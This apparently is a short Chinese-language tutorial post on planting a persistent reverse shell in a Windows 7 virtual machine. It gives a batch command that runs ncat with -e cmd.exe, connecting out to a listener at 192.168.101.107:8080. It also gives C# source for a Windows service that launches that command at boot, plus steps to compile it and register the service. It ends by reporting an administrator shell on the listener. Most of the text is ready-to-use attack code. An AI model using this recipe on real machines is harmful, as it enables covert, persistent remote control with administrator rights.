用虚拟机win7做服务器
需要编辑两个文件,我全放在C盘根目录下,可以随便放。
首先写一个反弹shell的批处理文件,如:.bat格式 保存为www.bat
IP地址写你自己本机的IP,win7的ncat的存放路径
d:\\nmap\\ncat.exe 192.168.101.107 8080 -e C:\\windows\\system32\\cmd.exe
再用windows自带的工具将他编译成.exe文件
再编写一个文件保存.cs格式 如:qqq.cs
using System.ServiceProcess;
namespace Demo
{
public class Service : ServiceBase
{
protected override void OnStart(string[] args)
{
System.Diagnostics.Process.Start("C:\www.bat");
}
}
static class Program { static void Main() { ServiceBase.Run(new ServiceBase[] { new Service() }); } }
}
打开cmd切到C:\Windows\Microsoft.NET\Framework\v3.5目录下
运行csc.exe编译qqq.cs文件,
会在C:\Windows\Microsoft.NET\Framework\v3.5生成qqq.exe文件
如:
C:\Windows\Microsoft.NET\Framework\v3.5生成qqq.exe文件
接着创建一个系统服务,调用qqq.exe的路径。
起的服务名叫shell,你们可以随便起。
成功!我们用输入的那个ip监听,win7开机就会反弹自己的shell给我们。
接下来实验一下。
在192.168.101.107开启监听8080端口。
在win7启动一下shell服务
192.168.101.107连接成功,而且是管理员权限。